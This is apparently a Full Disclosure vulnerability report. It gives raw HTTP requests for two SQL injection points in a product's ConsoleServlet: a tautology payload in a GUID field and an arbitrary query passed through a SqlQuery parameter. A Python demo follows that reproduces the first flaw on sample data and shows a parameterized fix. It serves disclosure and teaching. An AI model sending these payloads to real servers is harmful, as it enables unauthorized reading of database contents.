Hi Brandon,

we found two injection points. One in the BinaryFileHandler class:

POST /servlet/ConsoleServlet HTTP/1.1
Host: 192.168.40.133:8443
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Cookie: JSESSIONID=D739FA0884EB78B31B1D23AEA899C175

ActionType=BinaryFile&Action=EXISTS&GUID=0'or'1'='1

And one in the ExpRecordHandler class:

POST /servlet/ConsoleServlet HTTP/1.1
Host: 192.168.40.133:8443
Cookie: JSESSIONID=D739FA0884EB78B31B1D23AEA899C175; REQUESTSIG=09E0C480920F594CBD036BD07DC9A0B13198C99E8AFD93C83A2174710122381CD74369B6A1F2A53CA3121005A65062406DCDDBDCADCE182A532F8D1C47DCC6730CA872CA488D26A8A9E0CF296B99FEC0165F757A486DC66D28012BDD15C4C0F151AFF64A8F4724161C26C2D820D3BB14C248C0E748852BE52CBEE7CC5C04E5E26B415AD471A2FD03E4151798DE7021B8
Content-Type: application/x-www-form-urlencoded
Content-Length: 329

ActionType=ExpRecord&ObjectType=SemClient&SqlQuery=SELECT+@@version+AS+CLIENT_ID,DOMAIN_ID,GROUP_ID,GROUP_IS_OU,OU_GUID,POLICY_MODE,COMPUTER_ID,HARDWARE_KEY,COMPUTER_NAME,COMPUTER_DOMAIN_NAME,DESCRIPTION,USER_NAME,FULL_NAME,USER_DOMAIN_NAME,HASH,PIN_MARK,EXTRA_FEATURE,CREATOR,CREATION_TIME,USN,TIME_STAMP,DELETED+from+SEM_CLIENT

Both require authentication. The latter also requires a request signature (REQUESTSIG), which is based on the requested parameters and a hard-coded key.

-- 
Markus Wulftange
Senior Penetration Tester

Code White GmbH
Magirus-Deutz-Straße 18
89077 Ulm
E-Mail markus.wulftange@xxxxxxxxxxxxxx
PGP C6D6 C18B BAB9 0089 6942 213D 7772 8552 E9F8 6F39
http://www.code-white.com

Code White GmbH
Sitz und Registergericht/Domicile and Register Court: Stuttgart, HRB-Nr./Commercial Register No.: 749152
Geschäftsführung/Management: Dr. Helmut Mahler, Andreas Melzner, Lüder Sachse
Attachment:
signature.asc
Description: OpenPGP digital signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
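The first injection point above is a boolean-based one: the GUID parameter of the BinaryFile EXISTS action is spliced into the SQL text, so the posted payload 0'or'1'='1 turns the existence check into one that is always true. The following example is added here for illustration and is not code from the post or from the product. It models only that first finding, not the ExpRecord/SqlQuery one. The table name binary_file, its single GUID column, the sample rows and the use of an in-memory sqlite3 database in place of the real backend are all assumptions; the real schema is not given in the post.

```python
import sqlite3

# Constructed sample data (assumption): a stand-in for whatever table backs
# the BinaryFile EXISTS action. The real table name and schema are unknown.
SAMPLE_GUIDS = [
    "11111111-2222-3333-4444-555555555555",
    "66666666-7777-8888-9999-000000000000",
]

# The payload exactly as it appears in the posted request: GUID=0'or'1'='1
PAYLOAD = "0'or'1'='1"


def make_db():
    """Build an in-memory database with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE binary_file (GUID TEXT PRIMARY KEY)")
    conn.executemany("INSERT INTO binary_file VALUES (?)",
                     [(g,) for g in SAMPLE_GUIDS])
    return conn


def rendered_query(guid):
    """The SQL text a string-concatenating handler would send for this GUID."""
    return "SELECT COUNT(*) FROM binary_file WHERE GUID='" + guid + "'"


def exists_vulnerable(conn, guid):
    """EXISTS check built by concatenation: the request value becomes SQL.

    With the payload the WHERE clause reads GUID='0' or '1'='1', which
    matches every row, so a GUID that does not exist is reported as existing.
    """
    return conn.execute(rendered_query(guid)).fetchone()[0] > 0


def exists_parameterized(conn, guid):
    """The same check with a bound parameter: the value is compared as data,
    never parsed as SQL, so the payload is just a GUID that is not present."""
    row = conn.execute("SELECT COUNT(*) FROM binary_file WHERE GUID=?",
                       (guid,)).fetchone()
    return row[0] > 0


def injection_oracle(conn, exists_fn):
    """Boolean-based probe of the kind used to spot this finding.

    A value that cannot exist ('0') must answer False. If the tautology
    payload answers True instead, the parameter is being interpreted as SQL.
    """
    baseline = exists_fn(conn, "0")
    probe = exists_fn(conn, PAYLOAD)
    return baseline is False and probe is True


if __name__ == "__main__":
    db = make_db()
    print(rendered_query(PAYLOAD))
    print("concatenated handler injectable:", injection_oracle(db, exists_vulnerable))
    print("parameterized handler injectable:", injection_oracle(db, exists_parameterized))
```

injection_oracle is the same differential test a tester runs by hand: one request with an impossible value, one with the tautology, and a comparison of the two EXISTS answers. The parameterized variant shows the fix for this class of handler; it does not address the ExpRecord action, where the whole SqlQuery parameter is the query and the only gate is a signature computed with a key the server itself ships.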